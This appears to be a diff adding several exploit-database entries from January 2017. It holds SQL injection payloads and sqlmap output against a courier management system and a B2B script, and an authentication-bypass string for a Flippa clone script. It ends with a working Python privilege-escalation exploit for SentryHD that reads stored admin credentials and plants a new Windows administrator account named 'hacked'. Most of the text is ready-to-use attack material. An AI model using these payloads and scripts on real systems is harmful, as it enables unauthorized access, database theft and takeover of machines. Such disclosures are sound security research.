+Courier Management System is the simplest solution for Courier & Cargo Tracking Business. If you need to enable Tracking Option in your existing or new website, this is quickest Software Solution.You can get install it yourselves or We do the installation and brand it in your name on your hosting.The Courier Software is Very easy to setup and manage powerful administration. Provide online tracking system of consignment and shipping detail for International or domestic shipping
+
+## Vulnerability : ## 
+The login portal is vulnerable to SQLi and cross-site scripting attacks
+
+-HTTP Method : POST
+
+POST /cms/login.php HTTP/1.1
+Host: 192.168.19.135
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.19.135/cms/login.php
+Cookie: PHPSESSID=q446r5fqav1qlljb7cohd29r85
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 84
+
+txtusername=test&txtpassword=test&OfficeName=Fast+Courier+-+Jalgaon&Submit=Login+Now
+
+- Sqlmap command: sqlmap -r exploit.txt
+
+- Sqlmap Output : 
+ sqlmap identified the following injection point(s) with a total of 824 HTTP(s) requests:
+---
+Parameter: txtpassword (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
+    Payload: txtusername=test&txtpassword=test' OR NOT 5887=5887#&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: txtusername=test&txtpassword=test' AND (SELECT 9962 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(9962=9962,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CqJl&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: txtusername=test&txtpassword=test' OR SLEEP(5)-- VMai&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
+
+Parameter: txtusername (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: txtusername=test' RLIKE (SELECT (CASE WHEN (9742=9742) THEN 0x74657374 ELSE 0x28 END))-- FJke&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: txtusername=test' AND (SELECT 6984 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(6984=6984,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nDYx&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: txtusername=test' AND (SELECT * FROM (SELECT(SLEEP(5)))Aols)-- LarG&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
+---
+[16:59:17] [INFO] the back-end DBMS is MySQL
+web server operating system: Windows
+web application technology: Apache 2.4.23, PHP 5.6.24
+back-end DBMS: MySQL >= 5.0

platforms/php/webapps/41114.txt

@@ -0,0 +1,16 @@
+# # # # # 
+# Vulnerability: SQL Injection + Authentication Bypass
+# Date: 18.01.2017
+# Vendor Homepage: http://www.scriptgiant.com/
+# Script Name: Flippa Website Script
+# Script Buy Now: http://www.popularclones.com/products/Flippa-Website
+# Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# Authentication Bypass :
+# http://localhost/[PATH]/admin_new/ and set Username:'or''=' and Password to 'or''=' and hit enter.
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/admin_new/category.entryform.php?cat_id=[SQL]
+# http://localhost/[PATH]/admin_new/page.editor.php?id=[SQL]
+# E.t.c.... Other files, too. SQL There are security vulnerabilities.

platforms/php/webapps/41116.txt

@@ -0,0 +1,54 @@
+# Vulnerability: B2B Script v4.27 - SQL Injection
+# Date: 18.01.2017
+# Software link: http://itechscripts.com/b2b-script/
+# Demo: http://b2b.itechscripts.com
+# Price: 199$
+# Category: webapps
+# Exploit Author: Dawid Morawski
+# Website: http://www.morawskiweb.pl
+# Contact: dawidmorawski1990@gmail.com
+#######################################
+
+1. Description
+An attacker can exploit this vulnerability to read from the database.
+
+2. SQL Injection / Proof of Concept:
+
+http://localhost/[PATH]/search.php?keywords=[SQL]
+SQLmap outout:
+
+Parameter: keywords (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: keywords=-7908') OR 3641=3641#
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 2 columns
+    Payload: keywords=Products') UNION ALL SELECT
+NULL,CONCAT(0x716b7a7871,0x68634473486965586e6b57754358736b487a43564c6963646e556549454e476177776a5a6a7a4c4c,0x71767a7a71)#
+---
+[INFO] testing MySQL
+ [INFO] confirming MySQL
+ [INFO] the back-end DBMS is MySQL
+
+#########################################
+
+http://localhost/[PATH]/catcompany.php?token=[SQL]
+SQLmap outout:
+
+Parameter: token (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND 9125=9125 AND
+'HhOm'='HhOm
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d' AND SLEEP(5) AND
+'dWKJ'='dWKJ
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 6 columns
+    Payload: token=-7417' UNION ALL SELECT
+NULL,CONCAT(0x7171707071,0x6a6c6d484f58726e48446167417a66756464445941464844416856527a634a704f4b79647a494654,0x716b786271),NULL,NULL,NULL,NULL--
+aNXq

platforms/windows/local/41090.py

@@ -0,0 +1,106 @@
+# Exploit Title: SentryHD 02.01.12e Privilege Escalation
+# Date: 18-01-2017
+# Software Link: http://www.minutemanups.com/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: local
+ 
+1. Description
+
+Every user can read: c:\Program Files (x86)\SentryHD\config.ini.
+
+Inside this ini file we can find login and password for web panel.
+
+UPSMan is running on autostart as System.
+
+Using Execute Command File we can execute commands on Scheduled system shutdown as System.
+
+https://security.szurek.pl/sentryhd-020112e-privilege-escalation.html
+
+2. Proof of Concept
+
+import ConfigParser
+import hashlib
+import re
+import urllib2
+import urllib
+from cookielib import CookieJar
+import os
+import datetime
+import subprocess
+import time
+
+new_user_name = "hacked"
+
+print "SentryHD 02.01.12e Privilege Escalation"
+print "by Kacper Szurek"
+print "http://security.szurek.pl/"
+print "https://twitter.com/KacperSzurek"
+
+config = ConfigParser.RawConfigParser()
+config.read('c:\\Program Files (x86)\\SentryHD\\config.ini')
+
+admin_user = config.get("Web", 'User0')
+admin_password = config.get("Web", 'Password0')
+
+print "[+] Find admin user: '{}' and password: '{}'".format(admin_user, admin_password)
+
+cj = CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+
+challenge = re.search("\"Challenge\" value=\"(.*?)\"", opener.open("http://localhost/").read())
+
+formdata = { "Username" : admin_user, "Password": admin_password, "Challenge" : challenge, "Response":  hashlib.md5(admin_user+admin_password+challenge.group(1)).hexdigest()}
+opener.open("http://localhost/delta/login", urllib.urlencode(formdata))
+
+if "calcResponse()" in opener.open("http://localhost/home.asp").read():
+	print "[-] Failed to login"
+	os._exit(0)
+
+bat_path = os.path.dirname(os.path.abspath(__file__))+"\\create_user.bat"
+payload = open(bat_path, "w")
+payload.write("net user {} /add\n".format(new_user_name))
+payload.write("net localgroup Administrators {} /add".format(new_user_name))
+payload.close()
+
+print "[+] Create payload: {}".format(bat_path)
+
+formdata = {"ACT_SHUT_TYPE":0, "ACT_UPS_DELAY":10, "ACT_PF_EN": "on", "ACT_OSD_PF":999, "ACT_BL_EN": "on", "ACT_OSD_BL":999, "ACT_SS_EN":"on","ACT_OSD_SS":999, "ACT_LS_EN":"on", "ACT_LS_DELAY":999, "SUB_SHUTDOWN":"Submit"}
+opener.open("http://localhost/delta/mgnt_reaction", urllib.urlencode(formdata))
+
+formdata = {"ACT_MSG_EN":1, "ACT_MSG_PERIOD":999, "ACT_CMD_EN":1, "ACT_CMD_FILE":bat_path, "ACT_CMD_BEFORE": 990, "SUB_REACTION":"Submit"}
+opener.open("http://localhost/delta/mgnt_reaction", urllib.urlencode(formdata))
+
+
+current_time = datetime.datetime.today()+datetime.timedelta(0,90)
+shutdown_date = current_time.strftime('%m/%d/%Y')
+shutdown_time = current_time.strftime('%H:%M')
+
+formdata = {"SSH_SD1":shutdown_date, "SSH_TM1":shutdown_time, "SSH_ACT1":1}
+opener.open("http://localhost/delta/mgnt_sschedule", urllib.urlencode(formdata))
+
+print "[+] Set shutdown time: {} {}".format(shutdown_date, shutdown_time)
+
+print "[+] Waiting for user creation"
+i = 0
+while True:
+	if i > 100:
+		print "[-] Exploit failed"
+		os._exit(0)
+
+	netuser, _ = subprocess.Popen("net users", stdout=subprocess.PIPE, stderr=None, shell=False).communicate()
+
+	if new_user_name in netuser:
+		break
+
+	print "." ,
+	time.sleep(2)
+	i += i
+
+print "\n[+] Account created, cancel shutdown"
+
+formdata = {"SHUT_CANCEL":"Cancel Countdown"}
+opener.open("http://localhost/delta/mgnt_control", urllib.urlencode(formdata))
+
+print "[+] OK"